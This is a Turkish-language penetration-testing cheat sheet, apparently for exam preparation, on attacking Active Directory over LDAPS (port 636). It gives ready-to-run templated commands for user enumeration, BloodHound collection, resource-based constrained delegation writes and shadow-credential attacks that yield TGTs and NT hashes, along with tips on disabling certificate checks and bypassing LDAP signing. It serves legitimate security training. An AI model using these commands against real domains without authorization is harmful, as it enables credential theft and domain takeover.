FOOTHOLD Metodoloji Cheat-sheet
636

LDAPS

ad

LDAPS (636/tcp) LDAP'in TLS sarili halidir. Bazi yazma islemleri (LDAP add/modify, ornegin RBCD/shadow credentials/parola degisimi, ADCS sertifika tabanli bind) sadece sifreli kanal uzerinden calisir - bu yuzden 636 cogu yazma tabanli saldiri icin zorunludur. Self-signed sertifikalara karsi dogrulamayi kapatmak gerekir.

┌──

Komutlar

ldapsearch ✓ EXAM-SAFE user
LDAPTLS_REQCERT=never ldapsearch -x -H ldaps://{{DC_IP}}:636 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(objectClass=user)' sAMAccountName
LDAPS uzerinden kimlikli sorgu. LDAPTLS_REQCERT=never self-signed DC sertifikasi dogrulamasini kapatir (aksi halde TLS hatasi). HackTricks - LDAP over TLS / ldapsearch LDAPS
netexec ✓ EXAM-SAFE user
nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --port 636 --users
NetExec LDAP'i acik 636 portu (LDAPS) uzerinden kullan. Channel binding/LDAP signing zorunlu ortamlarda 389 reddedilirse 636 sart. NetExec Wiki - LDAPS
impacket ✓ EXAM-SAFE user
impacket-rbcd -delegate-from 'ATTACKER$' -delegate-to 'TARGET$' -action write -dc-ip {{DC_IP}} '{{DOMAIN}}/{{USER}}:{{PASS}}'
Resource-Based Constrained Delegation: msDS-AllowedToActOnBehalfOfOtherIdentity yazma islemi LDAP write gerektirir ve genelde TLS (LDAPS/636) uzerinden gider. ad-rbcd zincirinin cekirdegi. The Hacker Recipes - RBCD / Impacket rbcd
certipy ✓ EXAM-SAFE user
certipy shadow auto -u '{{USER}}@{{DOMAIN}}' -p '{{PASS}}' -account 'TARGET' -dc-ip {{DC_IP}}
Shadow Credentials: hedefin msDS-KeyCredentialLink alanina anahtar yaz (LDAP write, TLS uzerinden) ve PKINIT ile TGT/NThash al. WriteProperty yetkisi gerekir. The Hacker Recipes - Shadow Credentials / Certipy shadow
bloodhound-python ✓ EXAM-SAFE user
bloodhound-python -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' -ns {{DC_IP}} --use-ldaps -c All --zip
BloodHound toplamasini LDAPS uzerinden yap (--use-ldaps). 389 imzalama nedeniyle reddediliyorsa bu sart olabilir. HackTricks - BloodHound LDAPS
openssl ✓ EXAM-SAFE
openssl s_client -connect {{DC_IP}}:636 -showcerts </dev/null 2>/dev/null | openssl x509 -noout -subject -issuer -dates
LDAPS sertifikasini incele: subject/issuer DC FQDN ve domain'i sizdirir, ADCS varligina ipucu verebilir. Recon icin faydali. HackTricks - TLS certificate recon

Port 636 - LDAPS (TLS Sarili LDAP)

LDAPS, LDAP’in TLS ile sifrelenmis halidir. Okuma icin 389 yeterken, bircok YAZMA islemi guvenli kanal ister.

1. Neden 636 Onemli

Microsoft, hassas LDAP yazma islemlerini (parola degisimi, RBCD icin msDS-AllowedToActOnBehalfOfOtherIdentity, shadow credentials icin msDS-KeyCredentialLink) cogunlukla sifreli kanal arkasinda tutar. Ayrica LDAP signing / channel binding zorunlu hale getirilmis DC’lerde 389 plaintext bind reddedilir; bu durumda 636 (ya da StartTLS) tek yoldur.

2. Enum - TLS Dogrulamasini Atlatma

DC sertifikalari genelde self-signed ya da kurumsal CA imzalidir; Kali bunlara guvenmez. LDAPTLS_REQCERT=never (ldapsearch) ya da --use-ldaps (bloodhound-python) ile dogrulamayi kapatip baglanirsin.

3. Attack Relevance - Yazma Tabanli Saldirilar

  • RBCD (ad-rbcd): hedef bilgisayar nesnesine delegation yazma.
  • Shadow Credentials: msDS-KeyCredentialLink yazip PKINIT ile NThash alma.
  • ADCS (ad-adcs): sertifika tabanli kimlikle LDAP bind. Bu islemler ACL abuse (ad-acl-abuse) ile bulunan yazma yetkilerini somut ele gecirmeye cevirir.

Gotchalar

  • TLS handshake hatasi = sertifika dogrulamasi; REQCERT=never ile cöz.
  • StartTLS (389 uzerinde TLS’e yukseltme) bazen 636 yerine kullanilir.
  • LDAP signing zorunluysa NTLM relay’i LDAP’a yapmak engellenir; bunun yerine LDAPS relay ya da channel binding bypass gerekir.
  • openssl ile sertifika recon’u ucretsiz FQDN/domain bilgisi verir.
┌──

İlgili teknikler

ACL İstismarı — GenericAll/GenericWrite/WriteDacl/WriteOwner/ForceChangePassword/AddMember/Shadow Creds/GMSAAD CS Sömürüsü — Certipy ile ESC1–ESC16, ESC8 Relay ve PassTheCertKimlik Doğrulamalı Domain Enumeration (Authenticated Enum)LAPS Parola Okuma (ms-Mcs-AdmPwd / msLAPS)Resource-Based Constrained Delegation (RBCD) — Computer Hesabına GenericWrite ile Takeover
┌──

Kaynaklar

↗ HackTricks - LDAP↗ The Hacker Recipes - RBCD↗ The Hacker Recipes - Shadow Credentials
0/15 set